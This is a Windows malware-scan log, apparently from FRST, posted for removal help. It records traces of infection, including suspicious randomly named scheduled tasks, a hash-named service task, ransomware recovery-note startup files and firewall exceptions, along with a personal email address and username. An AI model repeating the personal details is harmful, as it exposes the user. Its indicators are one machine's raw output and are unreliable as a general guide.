ContextMenuHandlers1-x32: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File

ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)

ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)

ContextMenuHandlers1-x32-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)

ContextMenuHandlers2: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)

ContextMenuHandlers2-x32: [VMDiskMenuHandler] -> {271DC252-6FE1-4D59-9053-E4CF50AB99DE} => C:\Program Files (x86)\VMware\VMware Player\vmdkShellExt.dll [2015-06-24] (VMware, Inc.)

ContextMenuHandlers2-x32: [VMDiskMenuHandler64] -> {E4D28EDC-8C0B-43EE-9E7D-C8A8682334DC} => C:\Program Files (x86)\VMware\VMware Player\x64\vmdkShellExt64.dll [2015-06-24] (VMware, Inc.)

ContextMenuHandlers3: [BackupContextMenuExtension] -> {b1b96b20-da1d-4a3c-92c1-7229b32f2326} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)

ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)

ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2013-11-13] (Intel Corporation)

ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()

ContextMenuHandlers6: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)

ContextMenuHandlers6: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)

ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program File (x86) - RevoUninPro - Uninstaller program - 30 Day Free Trial - 5-15-2016\Revo Uninstaller Pro\RUExt.dll [2012-12-29] (VS Revo Group)

ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)

ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)

ContextMenuHandlers6-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)

ContextMenuHandlers1_S-1-5-21-1066246007-1091995785-1061003623-1001: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File

 

==================== Scheduled Tasks (Whitelisted) =============

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

Task: {0871BC7F-DE9B-4C30-A460-54D7FCC6F3C7} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)

Task: {0B68F930-F054-44FD-8480-C9B2E8CE6446} - System32\Tasks\AsusVibeSchedule => C:\Program Files (x86)\Asus\AsusVibe\AsusVibeLauncher.exe [2013-11-04] ()

Task: {13F4F7F9-754A-479C-95B7-2668E5195C53} - System32\Tasks\ASUS Live Update2 => C:\Program Files (x86) [Argument = -check]

Task: {2283DE1E-0461-4B5C-93B8-792D6C6384D6} - System32\Tasks\{31DDBD37-5DB7-4030-8064-10B0CAA806C3} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)

Task: {2BD7BF5D-C4CF-4669-A2BC-FD410979401B} - System32\Tasks\ASUS Live Update1 => C:\Program Files (x86) [Argument = -critical]

Task: {39FEF968-A8FF-4F5C-9196-0E7AA2353384} - System32\Tasks\ASUS Smart Gesture Launcher => C:\Program Files (x86)\ASUS\ASUS Smart Gesture\AsTPCenter\x64\AsusTPLauncher.exe [2014-03-31] (AsusTek)

Task: {4C290D38-8E4F-4E0C-8A57-748C6445EFF3} - System32\Tasks\ASUS Splendid ColorU => C:\Program Files (x86)\ASUS\Splendid\ColorUService.exe [2013-10-07] (ASUSTeK Computer Inc.)

Task: {4D574819-623E-459C-ADAA-ABE4DA8328F0} - System32\Tasks\RTKCPL => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [2014-03-20] (Realtek Semiconductor)

Task: {547698E5-4F4A-441A-BB7D-0BCEAA6F0593} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-11-12] (Google Inc.)

Task: {59E33C91-940C-4B1B-8875-D56CF8C1F9EA} - System32\Tasks\PinItAutoUpdate => C:\Program Files (x86)\Pinterest\Pin It\AutoUpdater.exe [2013-10-17] ()

Task: {5AA3BDDC-F135-471F-BAFD-C4667F07FEC5} - System32\Tasks\{D3CF4331-7A31-4F84-BB21-69FA5F743E7A} => C:\Windows\system32\pcalua.exe -a C:\Windows\986246e4d4365334c49f584d3435ca41.exe

Task: {73A5F5CB-0B75-4158-B3D5-60B79A55381B} - System32\Tasks\COMODO\COMODO Signature Update {B9D5C6F9-17D2-4917-8BD0-614BAA1C6A59} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)

Task: {7A810030-3719-44B1-86D4-C623F0136B7E} - System32\Tasks\COMODO\COMODO Autostart {D5EFF3B3-E126-4AF6-BCE9-852A72129E10} => C:\Program Files\COMODO\COMODO Internet Security\cistray.exe [2016-07-10] (COMODO)

Task: {885E1D98-007F-4A6C-9B21-CB66F24620E1} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-02-12] (Piriform Ltd)

Task: {933A0EAA-67D1-40AD-8272-FE777ED5D1C2} - System32\Tasks\{C26243DB-2C37-44EE-9F28-CE2E8B7FC0E3} => C:\Program Files (x86)\pAuZbg.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION

Task: {97F7FC31-B27F-47F6-A95A-B187E18672B2} - System32\Tasks\{81D52804-7B29-49D2-80AA-07954E82952B} => C:\Program Files (x86)\YuIeaAuVrYQ.exe [1623-04-04] (Microsoft Corporation) <==== ATTENTION

Task: {985790D0-EF1D-4BF1-96BA-E15830E37E2E} - System32\Tasks\COMODO\COMODO Update {A6D52E4F-569B-4756-B3D8-DF217313DA85} => C:\Program Files\COMODO\COMODO Internet Security\cfpconfg.exe [2016-07-10] (COMODO)

Task: {9C0EB61C-E232-4548-847B-0FBE48C483F2} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)

Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate -nolegacy

Task: {9E90D4EA-24E8-466B-AEE7-2D93FD4EFF51} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(2): %windir%\system32\rundll32.exe -> appraiser.dll,DoScheduledTelemetryRun

Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate

Task: {B489F90E-C13F-4994-9853-8778C8E31344} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate

Task: {B555837A-F36E-4453-A0C0-E1982D23AE8A} - System32\Tasks\ASUS Splendid ACMON => C:\Program Files (x86)\ASUS\Splendid\ACMON.exe [2013-10-07] (ASUS)

Task: {B68434B3-38F7-4E31-9788-A98D73098673} - System32\Tasks\{CF06CADB-185A-4E37-941E-EF8A74A640B8} => C:\Windows\system32\pcalua.exe -a "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "E:\Free Software Programs\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"

Task: {BCE45004-B0FC-4F7C-9E96-2E7DBD2AE33E} - System32\Tasks\AdobeAAMUpdater-1.0-MicrosoftAccount-danbanic1@hotmail.com => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)

Task: {C0EA6C51-0D21-4C1C-9AD2-4B14A9002B63} - System32\Tasks\{7AABF775-AB66-4734-B6C6-CD26D49E39AF} => C:\Windows\system32\pcalua.exe -a "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP\Chopper.exe" -d "C:\Program File (x86) Chopper XP DVD VOP Video Cutter\Chopper XP"

Task: {C2E59037-9F26-40BC-B416-8F2A7E22E244} - System32\Tasks\Update Checker => C:\Program Files (x86)\ASUS\ASUS Live Update\UpdateChecker.exe [2014-03-11] ()

Task: {EB9B2DA6-E063-4F2A-A690-9A70E1E8FBE9} - System32\Tasks\RtHDVBg => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [2014-03-31] (Realtek Semiconductor)

Task: {F675F9DA-7832-44FC-B84F-99A0B7E15237} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)

Task: {FBF83420-4969-4297-B1AF-91B1C6329E4F} - System32\Tasks\6320c4d4d9492959f6f8b43b8fdbf2f5 => sc start 6320c4d4d9492959f6f8b43b8fdbf2f5 <==== ATTENTION

 

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

 

 

==================== Shortcuts & WMI ========================

 

(The entries could be listed to be restored or removed.)

 

 

Shortcut: C:\Users\Dan\Desktop\SoftTeddy 3D - run.bat - Shortcut.lnk -> C:\Program File (x86) SmoothTeddy 3D - Simple 3D Program\SmoothTeddy\run.bat ()

Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\ShapeShop3d.com.lnk -> hxxp://www.shapeshop3d.com

Shortcut: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShapeShop\Tutorial Videos At Vimeo.lnk -> hxxp://www.vimeo.com/shapesho

 

ShortcutWithArgument: C:\Users\Dan\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a06339e9776d4569\Instagram for Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> "

 

==================== Loaded Modules (Whitelisted) ==============

 

2015-02-02 09:23 - 2011-02-28 18:37 - 000095008 _____ () C:\Windows\System32\Primomonnt.dll

2016-05-22 19:33 - 2016-05-22 19:33 - 000491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll

2018-03-22 21:50 - 2018-03-22 21:50 - 000369872 _____ () C:\ProgramData\dahhService\dahhService.exe

2017-08-11 19:17 - 2018-03-07 22:45 - 012021840 _____ () C:\Program Files\Gramblr\gramblr.exe

2018-03-22 19:26 - 2018-03-20 02:00 - 002683224 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libglesv2.dll

2018-03-22 19:26 - 2018-03-20 02:00 - 000127832 _____ () C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\swiftshader\libegl.dll

2016-05-22 19:32 - 2016-05-22 19:32 - 031680176 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe

2014-02-24 06:59 - 2014-02-24 06:59 - 000109056 _____ () C:\Program Files (x86)\ASUS\WebStorage\2.1.2.301\ASUSWSHomeCloudAPI.dll

2018-03-22 21:52 - 2018-03-22 21:52 - 002150400 _____ () C:\Windows\9b2582d4a23748e2d93e755c9fbf7de5.dll

2013-10-08 23:41 - 2013-10-08 23:41 - 000037968 _____ () C:\Program Files (x86)\ASUS\Splendid\DetectDisplayDC.dll

2013-09-09 21:23 - 2013-09-09 21:23 - 000162816 _____ () C:\Program Files (x86)\ASUS\Splendid\CCTAdjust.dll

2015-06-24 15:28 - 2015-06-24 15:28 - 001301720 _____ () C:\Program Files (x86)\VMware\VMware Player\libxml2.dll

2016-08-24 08:45 - 2016-08-24 08:45 - 040523456 _____ () C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\CEF\libcef.dll

2016-06-08 00:10 - 2016-06-08 00:10 - 000118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\fs-ext\build\Release\fs-ext.node

2016-06-08 00:10 - 2016-06-08 00:10 - 000205824 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node

2016-06-08 00:10 - 2016-06-08 00:10 - 000117248 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ref\build\Release\binding.node

2016-06-08 00:10 - 2016-06-08 00:10 - 000125440 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ffi\build\Release\ffi_bindings.node

2016-08-24 08:24 - 2016-08-24 08:24 - 000098496 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll

2016-06-08 00:10 - 2016-06-08 00:10 - 000166400 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\idle-gc\build\Release\idle-gc.node

 

==================== Alternate Data Streams (Whitelisted) =========

 

(If an entry is included in the fixlist, only the ADS will be removed.)

 

AlternateDataStreams: C:\ProgramData\Temp:862BDB1A [139]

AlternateDataStreams: C:\Users\Dan\Downloads\Anti-CryptorBitV2.zip:BDU [1]

 

==================== Safe Mode (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

 

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSPrx => ""="service"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\CatWSw8 => ""="Driver"

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\ColorMedia => ""="service"

 

==================== Association (Whitelisted) ===============

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

 

 

==================== Internet Explorer trusted/restricted ===============

 

(If an entry is included in the fixlist, it will be removed from the registry.)

 

IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\groovesquid.com -> hxxps://groovesquid.com

IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\instagram.com -> hxxps://instagram.com

IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mediashuttle.com -> hxxps://media-shuttle-free-trial-portal.mediashuttle.com

IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\mycloud.com -> hxxps://idp.mycloud.com

IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\spotify.com -> hxxps://www.spotify.com

IE trusted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\winamp.com -> hxxps://www.winamp.com

IE restricted site: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\doubleclick.net -> hxxps://doubleclick.net

 

==================== Hosts content: ==========================

 

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

 

2013-08-22 09:25 - 2018-03-22 21:51 - 000001330 _____ C:\Windows\system32\Drivers\etc\hosts

 

127.0.0.1 cpm.paneladmin.pro

127.0.0.1 publisher.hmdiadmingate.xyz

127.0.0.1 hmdicrewtracksystem.xyz

127.0.0.1 mydownloaddomain.com

127.0.0.1 linkmate.space

127.0.0.1 space1.adminpressure.space

127.0.0.1 trackpressure.website

127.0.0.1 doctorlink.space

127.0.0.1 plugpackdownload.net

127.0.0.1 texttotalk.org

127.0.0.1 gambling577.xyz

127.0.0.1 htagdownload.space

127.0.0.1 mybcnmonetize.com

127.0.0.1 360devtraking.website

127.0.0.1 dscdn.pw

127.0.0.1 bcnmonetize.go2affise.com

127.0.0.1 beautifllink.xyz

 

==================== Other Areas ============================

 

(Currently there is no automatic fix for this section.)

 

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\asus\wallpapers\asus.jpg

DNS Servers: Media is not connected to internet.

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: RequireAdmin)

Windows Firewall is enabled.

 

==================== MSCONFIG/TASK MANAGER disabled items ==

 

HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"

HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"

HKLM\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"

HKLM\...\StartupApproved\Run32: => "YTDownloader"

HKLM\...\StartupApproved\Run32: => "avgnt"

HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"

HKLM\...\StartupApproved\Run32: => "Dropbox"

HKLM\...\StartupApproved\Run32: => "APSDaemon"

HKLM\...\StartupApproved\Run32: => "QuickTime Task"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.html"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.png"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+pillt.txt"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.html"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.png"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\StartupFolder: => "_RECOVERY_+vplym.txt"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "ChocolateBar Sidebar"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "YTDownloader"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "xdm"

HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\StartupApproved\Run: => "CCleaner Monitoring"

 

==================== FirewallRules (Whitelisted) ===============

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

FirewallRules: [{84E7D022-D859-4AAD-93A3-1E9E9F1C1E0D}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD10\PowerDVD10.EXE

FirewallRules: [{CEC34761-FBD2-4DD1-8310-5F8AAF53D82E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe

FirewallRules: [{F5CAA7A9-D801-4982-AFF8-C7D20E365B8F}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nswB7A8.tmp\CnetInstaller-75409715.exe

FirewallRules: [{9AD6A247-DC93-49BD-8D91-890B72E639F4}] => (Allow) LPort=1886

FirewallRules: [{9EA4A53B-4ABC-431F-BAC0-C0EC0E42A3FE}] => (Allow) LPort=1886

FirewallRules: [{FEBB96C1-B31C-436C-A9CC-4ACDFDCEB1D1}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe

FirewallRules: [{3CE5225E-435B-4FE5-A84B-1C2A07EC44D6}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe

FirewallRules: [{7D2E9490-E89D-4031-927A-417C014ADFFC}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe

FirewallRules: [{55D48809-1F66-4497-9319-FE74A5051B36}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe

FirewallRules: [{E54BD4BD-3E8D-48F2-97B8-FFF46F726355}] => (Allow) C:\ProgramData\makulitsidwe\1.1.0.29\cozaghost.exe

FirewallRules: [{0FF7443B-3A64-41AE-B2A4-92DD6C564CDF}] => (Allow) C:\Users\Dan\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe

FirewallRules: [{5EF00627-14E5-43A4-B60F-A6A8995519C2}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe

FirewallRules: [{7A2FABE4-0106-4B09-A794-4F7019561123}] => (Allow) LPort=2869

FirewallRules: [{FC21E2C2-60FC-4224-9CD1-3C4CE101335A}] => (Allow) LPort=1900

FirewallRules: [{AB859042-2A95-4E72-A252-8A16F00E2698}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe

FirewallRules: [{07710B1F-203C-4B52-80E1-6E5A435B0B49}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe

FirewallRules: [{6E036BFF-833F-4CBD-99E0-702EBDE37553}] => (Allow) C:\Program Files (x86)\Techgile\bin\Techgile.BRT.Helper.exe

FirewallRules: [{CF59B7AE-9D77-40E1-B0FF-DD3E8617864B}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe

FirewallRules: [{A2503CB4-8DD7-4CC1-A35F-44508F1217D5}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser\Winamp\winamp.exe

FirewallRules: [{D6E98B02-4D68-4CC7-81C6-AF5504789A11}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe

FirewallRules: [{E0012F5B-40C2-4C24-9F76-8D65BAE96E8D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jrmcp.exe

FirewallRules: [{65BCBA58-B251-45D5-8F6F-4AFDD83D9EA3}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe

FirewallRules: [{8A98D66E-7964-43B4-828C-2636B3B9C376}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jbp.exe

FirewallRules: [{C6709782-46D1-43D4-AA0D-221D650F01CE}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe

FirewallRules: [{41D0374F-2166-47ED-9C01-347C96AD8EEA}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\jwmpp.exe

FirewallRules: [{0D4021A7-68FA-4CAD-A92D-9B89BAB9D6D8}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe

FirewallRules: [{61459AFB-F078-4819-83A0-32430B3DFE90}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\ffmpeg.exe

FirewallRules: [{FB331439-BAF3-421D-8363-0B7DBAF28328}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe

FirewallRules: [{828F9004-D6AD-424B-B9AF-358E09E6D59D}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\aria2c.exe

FirewallRules: [{61951D9D-D9E8-4098-BBC4-DCE2C15E0A37}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe

FirewallRules: [{9D7ECD7E-4081-463D-A7A1-66901FB4631A}] => (Allow) C:\Program File (x86) Replay Media Catcher Video & Audio Downloader\Replay Media Catcher 5\qtCopy.exe

FirewallRules: [TCP Query User{0D97D9AA-F1E5-482A-B3FF-B4CBC63122EE}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe

FirewallRules: [UDP Query User{4D865EC7-719F-465D-8376-EDE19BB17CB9}C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe

FirewallRules: [TCP Query User{C62A3DCA-EF3A-4BFA-AD77-530BA8EB30A7}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe

FirewallRules: [UDP Query User{6002DF46-D0C0-4D0D-A7CF-623A681197EA}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe

FirewallRules: [TCP Query User{BB8345BC-ECD7-4471-B25A-9D853E961F5A}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe

FirewallRules: [UDP Query User{7FC4D6EF-81C4-458F-9B40-AD7B400A1E4C}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe

FirewallRules: [TCP Query User{BC5A050A-5C0E-454E-A679-0B6F74B6AEEB}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe

FirewallRules: [UDP Query User{06AE2A0A-79C9-42E3-8D44-832B7E14FA66}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe

FirewallRules: [{C1CDE395-B54A-41F5-8253-D1C74388EEBD}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe

FirewallRules: [{4C545804-7C07-4B6F-B73F-E447437D340D}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe

FirewallRules: [TCP Query User{F025769D-FD8B-45D2-A905-50841DDDB59B}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe

FirewallRules: [UDP Query User{B22891B0-0B73-4385-81F5-B178F881D091}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe

FirewallRules: [{A879E9E7-D547-4AB8-9183-31F47DA82E93}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe

FirewallRules: [{5452DD3B-F6A9-4B86-856D-2147672734F5}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe

FirewallRules: [{2029387B-0B9A-48C5-8D70-D9624A75818D}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe

FirewallRules: [{23995299-1FD2-4CFE-B8AF-2086099394E8}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe

FirewallRules: [{0DD782B8-3E36-4357-B248-4A58956BA95E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe

FirewallRules: [{3435D53E-9FD6-4668-BF9A-6D30B08E5FEE}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe

FirewallRules: [{FF5E24B4-1562-4D0E-B0F0-B909F14E18B7}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe

